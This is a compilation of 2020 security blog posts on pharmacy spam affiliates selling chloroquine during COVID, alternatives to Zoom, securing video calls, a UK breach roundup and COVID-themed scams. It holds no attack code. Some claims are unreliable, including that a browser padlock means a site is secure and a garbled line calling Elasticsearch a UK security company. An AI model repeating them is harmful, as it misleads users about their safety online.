KrebsOnSecurity reviewed a number of the most popular online pharmacy enterprises, in part by turning to some of the same accounts at these invite-only affiliate programs I relied upon for researching my 2014 book, Spam Nation: The Inside Story of Organized Cybercrime, from Global Epidemic to Your Front Door.

Many of these affiliate programs — going by names such as EvaPharmacy, Rx-Partners and Mailien/Alientarget — have been around for more than a decade, and were major, early catalysts for the creation of large-scale botnets and malicious software designed to enslave computers for the sending of junk email.

Their products do not require a prescription, are largely sourced directly from pharmaceutical production facilities in India and China, and are shipped via international parcel post to customers around the world.

In mid-March, two influential figures — President Trump and Tesla CEO Elon Muskbegan suggesting that hydroxychloroquine should be more strongly considered as a treatment for COVID-19.

The pharmacy affiliate programs immediately took notice of a major moneymaking opportunity, noting that keyword searches for terms related to chloroquine suddenly were many times more popular than for the other mainstays of their business.

“Everyone is hysterical,” wrote one member of the Russian language affiliate forum gofuckbiz[.]com on Mar. 17. “Time to make extra money. Do any [pharmacy affiliate] programs sell drugs for Coronavirus or flu?”

The larger affiliate programs quickly pounced on the opportunity, which turned out to be a major — albeit short-lived — moneymaker. Below is a screenshot of the overall product sales statistics for the previous 30 days from all affiliates of PharmCash. As we can see, Aralen — a chloroquine drug used to treat and prevent malaria — was the third biggest seller behind Viagra and Cialis.

Recent 30-day sales figures from the pharmacy affiliate program PharmCash.

In mid-March, the affiliate program Rx-Partners saw a huge spike in demand for Aralen and other drugs containing chloroquine phosphate, and began encouraging affiliates to promote a new set of product teasers targeting people anxiously seeking remedies for COVID-19.

Their main promotion page — still online at about-coronavirus2019[.]com — touts the potential of Aralen, generic hydroxychloroquine, and generic Kaletra/Lopinavir, a drug used to treat HIV/AIDS.

An ad promoting various unproven remedies for COVID-19, from the pharmacy affiliate program Rx-Partners.

On Mar. 18, a manager for Rx-Partners said that like PharmCash, drugs which included chloroquine phosphate had already risen to the top of sales for non-erectile dysfunction drugs across the program.

But the boost in sales from the global chloroquine frenzy would be short-lived. Demand for chloroquine phosphate became so acute worldwide that India — the world’s largest producer of hydroxychloroquine — announced it would ban exports of the drug. On Mar. 25, India also began shutting down its major international shipping ports, leaving the pharmacy affiliate programs scrambling to source their products from other countries.

A Mar. 31 message to affiliates working with the Union Pharm program, noting that supplies of Aralen had dried up due to the shipping closures in India.

India recently said it would resume exports of the drug, and judging from recent posts at the aforementioned affiliate site gofuckbiz[.]com, denizens of various pharmacy affiliate programs are anxiously awaiting news of exactly when shipments of chloroquine drugs will continue.

“As soon as India opens and starts mail, then we will start everything, so get ready,” wrote one of Rx-Partners’ senior recruiters. “I am sure that there will still be demand for pills.”

Global demand for these pills, combined with India’s recent ban on exports, have conspired to create shortages of the drug for patients who rely on it to treat chronic autoimmune diseases, including lupus and rheumatoid arthritis.

While hydroxychloroquine has long been considered a relatively safe drug, some people have been so anxious to secure their own stash of the drug that they’ve turned to unorthodox sources.

On March 19, Fox News ran a story about how demand for hydroxychloroquine had driven up prices on eBay for bottles of chloroquine phosphate designed for removing parasites from fish tanks. A week later, an Arizona man died and his wife was hospitalized after the couple ingested one such fish tank product in hopes of girding their immune systems against the Coronavirus.

Despite many claims that hydroxychloroquine can be effective at fighting COVID-19, there is little real data showing how it benefits patients stricken with the disease. The largest test of the drug’s efficacy against Coronavirus showed no benefit in a large analysis of its use in U.S. veterans hospitals. On the contrary, there were more deaths among those given hydroxychloroquine versus standard care, researchers reported.

In an advisory released today, the U.S. Food and Drug Administration (FDA) cautioned against use of hydroxychloroquine or chloroquine for COVID-19 outside of the hospital setting or a clinical trial due to risk of heart rhythm problems.

Rethinking Zoom? How WebEx, Teams, and Google Meet and Duo Compare on Privacy and Security

If you’re among the many looking for a new video conferencing tool after adding “zoombombing” to your vocabulary, you’re in luck. While a one-size-fits-all solution doesn’t exist, there are many other options with proven security features. Here’s a roundup of some of Zoom’s competitors and their privacy and security features.

Webex

The Webex video conference platform has been around since 1995 and is a favorite of the privacy-conscious health care, information technology, and financial services industries. This is partially due to the fact that all three industries commonly relied on virtual meetings well before the Covid-19 pandemic, but mostly because Webex has a reputation for maintaining robust cybersecurity. Cisco, its parent company, is an industry leader in network hardware, software, and security products.

Webex offers end-to-end encryption. Using it, however, limits popular video options, including remote computer sharing and personal meeting rooms. Worth noting: Webex and Cisco products have had security issues in the past.

Microsoft Teams

Like Zoom, Microsoft Teams experienced an uptick in the recent crisis, in part due to its integration with the company’s flagship Office365 cloud and productivity services. Microsoft says that Teams are encrypted “in transit and at rest,” but details about support for end-to-end encryption are vague.

Like Webex, one advantage of Teams is that its parent company is a major provider of networking, software, and cybersecurity services. Microsoft has an internal rating system for the security of its products, and has designated Teams to be Tier-D compliant, which means that it can adhere to the strictest government and industry security standards and legal requirements.

Neither Microsoft nor Teams are immune to security vulnerabilities, but as a company, Microsoft’s bandwidth to address them when they occur is probably unparalleled. Microsoft also has a more transparent privacy policy and a better track record when it comes to protecting user and customer data than many of its competitors, including Zoom.

Google Hangouts/Google Duo

Google offers Hangouts and Duo as its two primary video meeting platforms–both offer “free” and paid versions bundled in with its G Suite line of applications. While Google Hangouts offers similar functionality to Zoom, it has a limit of 25 attendees per video conference. Other considerations include a long history of security and privacy concerns and the fact that Google Hangouts don’t offer end-to-end encryption.

Duo is end-to-end encrypted, and can support video meetings with up to 12 attendees.

Like Cisco and Microsoft, Google has more resources dedicated to cybersecurity, but the company has a lengthy track record of mining user data, especially for “free” services. The company is also notorious for quickly and unceremoniously dropping support for many of its projects, and has done so with several previous video conferencing and meeting apps.

Is Zoom Worth Sticking With?

It depends on your business needs. Zoom’s rapid increase in popularity in an already crowded market is a testament to its many qualities, features, and ease of use.

The company has made some misleading claims about user privacy and data, and the recent discovery of multiple serious security vulnerabilities will test the company’s ability to support and sustain its user base.

A good sign is that Zoom announced a 90-day freeze on any new features so it can focus on security and privacy issues. This move could help the platform and the company to continue the meteoric rise in the number of people using the service.

For industries with stringent data privacy and security requirements, platforms like Webex or Microsoft Teams may be a better fit, but every company, platform, and technology has its own set of drawbacks and vulnerabilities. The main takeaway is that every company, regardless of size, needs to have a solid understanding of what its own internal security needs are in order to make an informed decision.

The post Rethinking Zoom? How WebEx, Teams, and Google Meet and Duo Compare on Privacy and Security appeared first on Adam Levin.

How to Keep Your Video Conferencing Meetings Secure

Guest Post by By Tom Kellermann (Head Cybersecurity Strategist, VMware Carbon Black)

The sudden and dramatic shift to a mobile workforce has thrust video conferencing into the global spotlight and evolved video conferencing vendors from enterprise communication tools to critical infrastructure.

During any major (and rapid) technology adoption, cyberattackers habitually follow the masses in hopes of launching an attack that could lead to a pay day or give them a competitive advantage. This has not been lost on global organisations’ security and IT teams, who are quickly working to make sure their employees’ privacy and data remains secure.

Here are some high-level tips to help keep video conferencing secure.

Update the Application
Video conferencing providers are regularly deploying software updates to ensure that security holes are mitigated.  Take advantage of their diligence and update the app prior to using it every time.

Lock meetings down and set a strong password
Make sure that only invited attendees can join a meeting. Using full sentences with special characters included, rather than just words or numbers, can be helpful. Make sure you are not sharing the password widely, especially in public places and never on social media. Waiting room features are critical for privacy as the meeting host can serve as a final triage to make sure only invited participants are attending. Within the meeting, the host can restrict sharing privileges, leading to smoother meetings and ensuring that uninvited guests are not nefariously sharing materials. 

Discussing sensitive information
If sensitive material must be discussed, ensure that the meeting name does not suggest it is a top-secret meeting, which would make it a more attractive target for potential eavesdroppers.  Using code words to depict business topics is recommended during the cyber crime wave we are experiencing.

Restrict the sharing of sensitive files to approved file-share technologies, not as part of the meeting itself
Using an employee sharing site that only employees have access to (and has multi-factor authentication in place) is a great way to make sure sensitive files touch the right eyes only.  This should be mandated as this is a huge Achilles heel.

Use a VPN to protect network traffic while using the platform 
With so many employees working remotely, using a virtual private network (VPN) can help better secure internet connections and keep private information private via encryption. Public WiFi can be a gamble as it only takes one malicious actor to cause damage.  Do not use public WiFi, especially in airports or train stations.  Cyber criminals lurk in those locations.

If you can, utilise two networks on your home WiFi router, one for business and the other for personal use.
Make sure that your work computer is only connected to a unique network in your home. All other personal devices – including your family’s – should not be using the same network. The networks and routers in your home should be updated regularly and, again, should use a complex password. Additionally, you should be the only system administrator on your network and all devices that connect to it.

All of us have a role to play in mitigating the cyber crime wave.  Please remember these best practices the next time you connect. Stay safe online

Also related - How Safe are Video Messaging Apps such as Zoom?

Cyber Security Roundup for April 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, March 2020.

The UK went into lockdown in March due to the coronavirus pandemic, these are unprecedented and uncertain times. Unfortunately, cybercriminals are taking full advantage of this situation, both UK citizens and 
businesses have been hit with a wave of COVID-19 themed phishing emails, and scam social media and text messages (smishing). Which prompted warnings by the UK National Cyber Security Centre and UK Banks, and a crackdown by the UK Government.
Convincing COVID-19 Scam Text Message (Smishing)

I have not had the opportunity to analyse a copy of the above scam text message (smishing), but it looks like the weblink displayed is not as it appears. My guess is the link is not part of the gov.uk domain, but the attacker has used an international domain name homograph attack, namely using foreign font characters to disguise the true address of a malicious website that is linked.

I was privileged to be on The Telegraph Coronavirus Podcast on 31st March, where I was asked about the security of video messaging apps, a transcript of what I advised is here. Further coronavirus cybersecurity advice was posted on my blog, on working from home securely and to provide awareness of coronavirus themed message scams.  It was also great to see the UK payment card contactless limit increased from £30 to £45 to help prevent coronavirus spread.

March threat intelligence reports shone a light to the scale of the cybercriminal shift towards exploiting COVID-19 crisis for financial gains. Check Point Global Threat Index reported a spike in the registration of coronavirus themed domains names, stating more than 50% of these new domains are likely to be malicious in nature. Proofpoint reports for more 80% of the threat landscape is using coronavirus themes in some way.  There has been a series of hacking attempts directly against the World Health Organisation (WHO), from DNS hijacking to spread a malicious COVID-19 app to a rather weird plot to spread malware through a dodgy anit-virus solution

Away from the deluge of coronavirus cybersecurity news and threats, Virgin Media were found to have left a database open, which held thousands of customer records exposed, and T-Mobile's email vendor was hacked, resulting in the breach of their customers and employees personal data.  

International hotel chain Marriot reported 5.2 million guest details were stolen after an unnamed app used by guests was hacked. According to Marriots online breach notification, stolen data included guest name, address, email address, phone number, loyalty account number and point balances, employer, gender, birthdays (day and month only), airline loyalty program information, and hotel preferences. It was only on 30th November 2018 Marriott disclosed a breach of 383 million guestsTony Pepper, CEO at Egress said “Marriott International admitted that it has suffered another data breach, affecting up to 5.2 million people. This follows the well-documented data breach highlighted in November 2018 where the records of approximately 339 million guests were exposed in a catastrophic cybersecurity incident. Having already received an intention to fine from the ICO to the tune of £99m for that, Marriott will be more than aware of its responsibility to ensure that the information it shares and stores is appropriately protected. Not only does this news raise further concerns for Marriott, but it also serves as a reminder to all organisations that they must constantly be working to enhance their data security systems and protocols to avoid similar breaches. It will be interesting to see if further action is taken by the ICO”

Five billion records were found to be exposed by UK security company Elasticsearch.  Researchers also found an Amazon Web Services open MongoDB database of eight million European Union citizen retail sales records was left exposed, which included personal and financial information.  And Let’s Encrypt revoked over 3 million TLS certificates due to a bug which certification rechecking

March was another busy month for security updates, patch Tuesday saw Microsoft release fixes for 116 vulnerabilities and there was an out-of-band Microsoft fix for 'EternallDarkness' bug on 10th March, but a zero-day exploited vulnerability in Windows remained unpatched by the Seattle based software giants.  Adobe released a raft of security patches, as did Apple (over 30 patches), Google, Cisco, DrayTek, VMware, and Drupal.

Stay safe, safe home and watch for the scams.

BLOG
NEWS
    VULNERABILITIES AND SECURITY UPDATES
      AWARENESS, EDUCATION AND THREAT INTELLIGENCE

      How Safe are Video Messaging Apps such as Zoom?

      I was privileged to be part of The Telegraph Coronavirus Podcast today, where I was asked about the security of video messaging apps.



      'How safe are video messaging apps such as Zoom, and what should users bear in mind when using them?'

      My reply...
      Video messaging apps are an essential communication tool for at home and within businesses, especially during the COVID-19 lockdown period. They are generally safe to use but there are a few security risks which users should be aware of.

      Our increased use of video messaging apps has not gone unnoticed by cybercriminals, who are seeking to exploit the increase of use by sending phishing emails, social media scam messages and even scam text messages, with fake invitations to video messaging app meetings.

      Typically, these scam messages will entice you into either opening a malicious attachment or click a web link which directs to a malicious website. The ultimate aim of these cyberattacks is to deliver malicious software, such as ransomware which locks your PC and demands a ransom payment to unlock, scam a payment, or steal your personal information which can be resold to other cybercriminals on the dark web.

      So, never open an attachment or click on any links within any unexpected or suspicious emails, social media messages and text messages.

      The next piece of advice is to ensure your video messaging app is always kept up-to-date. Luckily most modern smartphones and computer operating systems will automatically update your apps, but it is always worth double-checking and not to suppress any app updates from occurring, as often the app updates are fixing security flaws.

      And finally, on home computers and laptops, when not using video messaging apps, either cover your webcam with a piece of tape or face your webcam towards a wall or ceiling, just in case your computer is covertly compromised and a malicious actor gains access to your computer's webcam.


      Additional
      One tip I didn't have time to say on the podcast, is always ensure your video chats are set to private, using a strong password to prevent ZoomBombingRecent reportshave shown a series of “Zoombombing” incidents lately, where unwanted guests have joined in on open calls. 

      Bharat Mistry, Principal Security Strategist at Trend Micro on Zoom advises “Although not alone in being targeted, Zoom has been the subject of some of the highest-profile incidents so far this year. Fortunately, there are things you can do to keep your business safe.

      It’s all about taking advantage of unsecure settings in the app, (and possibly using brute-force tools to crack meeting IDs). With access to a meeting, hackers could harvest highly sensitive and/or market-critical corporate information, or even spread malware via a file transfer feature.

      Hackers know users are looking en masse for ways to communicate during government lockdowns. By creating legitimate-looking Zoom links and websites, they could steal financial details, spread malware or harvest Zoom ID numbers, allowing them to infiltrate virtual meetings. One vendor discovered 2,000 new domains had been registered in March alone, over two-thirds of the total for the year so far.

      Risk mitigation:
      The good news is that there are several things you can do to mitigate the security risks associated with Zoom. The most basic are: 
      • Ensure Zoom is always on the latest software version
      • Build awareness of Zoom phishing scams into user training programmes. Users should only download the Zoom client from a trusted site and check for anything suspicious in the meeting URL when joining a meeting
      • Ensure all home workers have anti-malware including phishing detection installed from a reputable vendor
      Organisational preparedness:
      Next, it’s important to revisit those administrative settings in the app, to reduce the opportunities for hackers and Zoombombers. Fortunately, automatically generated passwords are now switched on by default, and the use of personal meeting IDs are switched off, meaning Zoom will create a random, one-off ID for each meeting. These setting should be kept as is. But organisations can do more, including:
      • Ensure you also generate a meeting ID automatically for recurring meetings
      • Set screen-sharing to “host only” to prevent uninvited guests from sharing disruptive content
      • Don’t share any meeting IDs online
      • Disable “file transfers” to mitigate risk of malware
      • Make sure that only authenticated users can join meetings
      • Lock the meeting once it’s started to prevent anyone new joining
      • Use waiting room feature, so the host can only allow attendees from a pre-assigned register
      • Play a sound when someone enters or leaves the room
      • Allow host to put attendees on hold, temporarily removing them from a meeting if necessary”

      Working from Home Cybersecurity Guidance


      Working from home comes with a range of security risks, but employees need to be educated too – human behaviour is invariably the weakest link in a company’s cybersecurity posture. In the current environment, with many more employees working at home, cybercriminals are actively looking for opportunities to launch phishing attacks and compromise the IT infrastructure of businesses, large and small. 

      Guidance on Working from Home All companies should start by reviewing the home working guidance available at the UK Government’s National Cyber Security Centre (NCSC). This resource helps companies prepare their employees and think about the best way to protect their systems. Crossword has been advising a number of its FTSE clients in a range of sectors, and below is a summary of the guidance given, in addition to that from the NCSC.

      Run Audio and Video calls Securely

      What is visible in the background of your screen during video calls and is someone monitoring who is on the call? The same is true for audio only calls. A team member should be responsible for ensuring only invited guests are present, and calls should be locked once started, so other participants cannot join.

      Educate Employees on Phishing attacks
      The NCSC mentions COVID-19 related Phishing attacks which use the current crisis to trick employees into clicking on fake links, downloading malware, and revealing passwords – so educate them. These could be fake HR notifications or corporate communications; fake tax credits; fake emails from mortgage providers; free meals and mechanisms for registering for them. The list is endless and cyber criminals are very news savvy and quick to adapt. Employees are likely to be more vulnerable to phishing attacks due to people rushing, fear, panic, and urgency; all the behavioural traits that result in successful phishing attacks.

      Automate Virtual Personal Network configurations (VPNs) 
      IT and Security teams may have a backlog of users to set up on VPNs, to provide secure connections to corporate networks. Do not allow employees to send data insecurely, use automation to make accelerated deployments and guarantee correct configuration. Even IT staff are fallible, and the combination of pressure of work volume and working fast, may leave a gaping hole in your infrastructure.

      Control the use of Personal Devices for Corporate Work
      Due to the rapid increase in home workers, many employees may be using their own devices to access emails and data, which may not be covered by Bring Your Own Device (BYOD) policies. What this means in practicality, is that employee’s personal devices may not be securely configured, nor managed properly and be more vulnerable. IT and Security teams again, may need to retrospectively ensure that employees are complying with BYOD policies, have appropriate endpoint security software installed etc.

      Stop Personal Email and Unauthorised Cloud Storage Use
      When companies are experiencing IT difficulties in setting up employees working from home, people may be tempted to use personal emails or their personal cloud to send and store data, as a work around. These are a risk and can be easy for cyber criminals to target to gain company information or distribute malware, as they are not protected by the corporate security infrastructure.

      Keep Collaboration Tools Up-to-date
      Tools such as Microsoft Teams, Zoom and Google Hangouts are great, but it is important to ensure all call participants are using the latest versions of the software, and that includes partners and customers that may be on calls. Employees should also only use the corporate approved tools and versions as they will have been tested by security teams for vulnerabilities, that could be exploited by cybercriminals. 

      Stuart Jubb, Consulting Director at Crossword commented: “Throughout the UK, companies are doing everything they can to ensure business continues as normally as possible as the COVID-19 situation develops. The guidance we are issuing today is a summary of the key points we have been discussing with our clients across a wide range of vertical markets. Good IT security measures are arguably more important than ever as companies become a largely distributed workforce, almost overnight. As ever though, it is not just about the technology, but good behaviour and education amongst employees as cybercriminals work to exploit any vulnerability they can find, whether that be a person, mis-configured tech, or unpatched software.”

      Coronavirus Cybersecurity: Scams To Watch Out For

      The Coronavirus pandemic has shocked the world in recent months, with many countries being forced to go into lockdown or encourage its nationals to self-isolate as much as possible. Many are trying to work out how to juggle working from home, caring for their children, managing their finances and looking after their health! But sadly, there’s one more thing you need to add to that list - staying safe online and watching out for scammers. 

      That’s because cybercriminals have decided to take advantage of the global fear, confusion and uncertainty around the world. Plus, vast numbers of people are now working from home and this usually means they are doing so with less cybersecurity measures in place than they would have in their office. 

      Malicious messages examples seen
      • email and social media messages impersonating medical expert bodies including the NHS, World Health Organization (WHO), and Centre for Disease and Control (CDC), requesting a donation to research a vaccine.
      • GOV.UK themed text messages titled 'You are eligible to get a tax refund (rebate) of 128.34 GBP
      • messages advertising protective masks and hand sanitisers from bogus websites
      So, despite this being a time when we all need to pull together and help one another out, there are still scammers out there looking to cause trouble. To help keep you safe online, Evalian has compiled a list of four of the most common Coronavirus scams happening right now, so you know what to look out for. 

      1. Phishing Scams 
      This is perhaps the biggest scam out there right now because phishing emails can come in many different forms. Most commonly, hackers are pretending to be health officials or national authorities offering advice about staying safe during the Corona outbreak. The reality is that they are trying to trick unsuspecting individuals into downloading harmful malware or providing sensitive, personal information. 

      Some of these phishing emails look really sophisticated, with one in particular being a fake email sent from the World Health Organisation (WHO), offering tips on how to avoid falling ill with the virus. Once the email user clicks on the link provided, they are redirected to a site that steals their personal information. The problem is, with so many people being genuinely worried about their health and hoping to stop the spread, many don’t suspect that these types of emails could be a scam. 

      The best way to avoid falling victim to these types of phishing emails is to look for suspicious email addresses or lots of spelling mistakes. And even if the email looks pretty legitimate, it might still be worth going direct to the sender’s website instead. For example, going direct to the World Health Organisation website for advice means you can avoid clicking any links from the email. That way you can find the information you need and reduce the risk of falling victim to a cybercrime. 

      Secondly, if an email asks for money or bitcoin donations to help tackle Coronavirus, don’t make any transfers. Again, if you wish to help by donating money or services, go directly to the websites of charities or health organisations to see how you can help.

      It’s also worth noting, that these phishing scams can also be received as a text message or phone call. If you receive strange texts or voicemails asking for donations, giving offers on vaccines or warning you about cases in your local area, approach with caution and certainly don’t give away any of your personal details. 

      2. Fake Websites
      Another common scam designed to play on fear and uncertainty is the setting up of fake websites. Cybercriminals are creating Coronavirus-related websites which claim to offer pharmaceuticals or remedies for the virus such as testing kits, vaccines, and other fake health solutions. The idea is to get anxious victims to part with their bank details or to hack their computer and install malware on their systems. 

      In these situations, there are some things you can do. Firstly, check if the website has a secure connection. You’ll know whether it does or doesn't by the padlock in the search bar. If there is a padlock in the search bar this means the site is secure, if there isn't, then it’s a good idea to avoid this site. Not only this but if the website is poorly designed and the text has a lot of spelling and grammatical errors, this could also be a big red flag. 

      Finally, it’s also important to be aware that not many sites are genuinely going to be offering these health solutions and if they appear to be selling in-demand products at an extremely low price, then it’s most likely a scam. Remember, if it seems to good to be true then it probably is. 

      3. App Scams 
      Cybercriminals are also targeting smartphones and mobile devices with dedicated Coronavirus apps. These apps claim to track the spread of the virus in your local area and with many people concerned about the proximity of the virus to their home, it’s not surprising that people are willing to download such an app. 

      The reality, however, is that the app then installs malware into your device and not only comprises your tech, but also all the personal information stored within it. In some cases, the app can lock victims out of their phone or tablet demanding a ransom to get back in, threatening to delete all the information, contact details and photos stored inside.

      4. Fake Coronavirus Maps
      Last but not least, the fake Coronavirus map scam. Similar to that of the tracking app, cybercriminals have begun circulating graphics of fake maps on which they claim to highlight where all the Coronavirus cases are in your country. These are usually sent round on social media and through email. 

      Of course, these images are not meant to educate or help you in any way. In fact, the scammers include malware in the links so that once you’ve clicked to open the image this immediately infects your device. In most cases, this has been reported to be the kind of bug that can steal data such as bank details, passwords, login information and other sensitive data stored on your device. 

      Look for the Red Flags 
      • Never open attachments or click on links within suspicious or unexpected emails, text and social media messages
      • Look for the suspicious signs; does the message convey a sense of urgency to perform an action?
      • Always remember legitimate organisations never ask for passwords, payment card details and sensitive data to be sent by email
      In these troubling and uncertain times, you’d be forgiven for falling for a scam if you thought for one second it could help to keep you and your family safe from this virus. But sadly, there are criminals out there taking advantage of people’s anxiety. So just be aware that these scams are happening and look out for the red flags we’ve mentioned above to help you stay safe online. 

      UK Payment Card Contactless Limit Increased from £30 to £45 prevent Coronavirus Spread

      The contactless payment card limit for in-store card transactions in the UK will be increased from £30 to £45 from 1st April. A good move for preventing COVID-19 spread at supermarkets and petrol stations via card payment pinpads, which are impossible to keep sanitised.

      Better still, everyone right now can benefit from secure MFA contactless payments with higher limits by setting up Apple Pay, Google Pay or, Samsung Pay on your smartphone.

      BRC Head of Payments Policy, Andrew Cregan, said: “The last contactless limit increase to £30 took two years to implement but, given the extraordinary circumstances we face today, this new £45 limit will be rolled-out from next week. Some shops will take longer to make the necessary changes, given the strain they’re under. In the meantime, most customers can continue to make contactless payments for higher amounts using their smart phone.”

      Honey, We’re Home! Securing Your Devices and Your Family Bond  

      family device security

      More and more parents and their kids are experiencing what it’s like to work and learn together from home these days. With this increase in device use, it’s more important than ever to verify that all the technology humming under your roof is as secure as possible.

      Securing family technology

      Run an overall security check. Taking an inventory of all your family’s connected devices and their security should be as important as keeping your doors locked and keeping batteries in your smoke alarms — your family’s safety depends on it. Consider installing a comprehensive security solution across all devices. This will help protect your family against malware, viruses, phishing attacks, and alert you to malicious websites. As part of your security check, be sure to update the software on all devices, including IoT products, TVs, and toys.

      Review parental controls. There’s no way around it. Device use will likely skyrocket under your roof for a while. Kids will be online for school, as well as for fun. You may have turned on some filtering on some devices and some social networks, but it may be time to bring on an extra set of eyes and ears with comprehensive filtering software. With increased tech use, parental controls will help monitor your child’s digital activity. Too, with a new work-at-home lifestyle, the software (with time limits) can also make scheduling family breaks together much more manageable.

      Secure your home router. Your router is akin to your family’s front door, and now is a great time to change the locks (your passwords) on this critical entryway into your home. If you are reluctant to change your passwords or think its a hassle, consider the simplicity of a password manager. Using a password manager will make changing passwords easy to change and easy to keep track of, which can boost overall security. If you are working from home, make sure your home network aligns with your company’s security expectations. For specifics on business security, read this post on working securely from home.

      Introduce a VPN (Virtual Private Network). If you’ve toyed with the idea of a VPN but just haven’t made a move, now is a great time. While you may not venture into public spaces much at the present moment, a VPN will add a significant layer of security on your devices if you take a break and go to a public park or if your kids need to go online while at a friend’s. Explain VPN benefits to your kids and how to log on. It’s easy, it’s smart, and it’s secure.

      Securing your family bond

      Create a schedule that works for everyone. Your home network is likely working on overdrive by now. With the extra online schooling, devices, and video calls taking place, your bandwidth may start to lag. This is because residential internet doesn’t rival business internet. Discuss a schedule for online time and the challenge of accomplishing mutual deadlines each day. Respect and honor one another’s responsibilities. If you’ve never had the chance to talk about the specifics of your job and daily tasks, maybe this is your chance.

      Acknowledge the stress of uncertainty. There are feelings — lots of feelings — that accompany change, and everyone’s response to it will vary. Shifting into an abrupt, new routine may feel confusing and confining to a child of any age and cause anxiety and emotions to run high. Talk through these feelings together as often as needed. Acknowledge your child’s losses — connection with teachers, sports, friends, events — and offer empathy and support.

      Explore new possibilities — together. No doubt, considerable shifts in a family’s routine can be stressful. Even so, there’s opportunity woven throughout every challenge. With some extra time management, it’s possible to discover some hidden opportunities and adventures along the way. Hiking, canoeing, and exploring the outdoors could become a new love for your family. Watching movie classics together, learning a new skill online, building something, or tackling overdue projects together may open up a new, shared passion. Endless possibilities await.

      Balance work, health, and family. Nothing will undermine your efforts to work from home more than a skewed work-life balance or school-life (yes, kids can go overboard too)! A recent study shows that remote workers are more productive than office workers and spend more time at their desks. For balance, consider setting firm office/school hours (for both you and the kids), taking exercise breaks throughout the day, and getting an accountability partner to help you stay on track. And, don’t forget — lots of eyes are watching you always — so modeling work-life-and-technology balance for your kids is teaching them with the same value.

      It’s a new frontier parent, but with the right tools and the proper support around you, anything is possible. Stay healthy, stay happy, and stay secure in this new remote, family adventure.

      The post Honey, We’re Home! Securing Your Devices and Your Family Bond   appeared first on McAfee Blogs.

      Fake Coronavirus tracking app exploiting our fear and vulnerable social situation

      As the Coronavirus spreads across countries creating fear across the globe, everybody wants to stay on top of any information related to it wanting to remain safe and away from infected people. Malware authors are also taking advantage of this situation. Previously on the Android Playstore, there were many  applications present which claimed…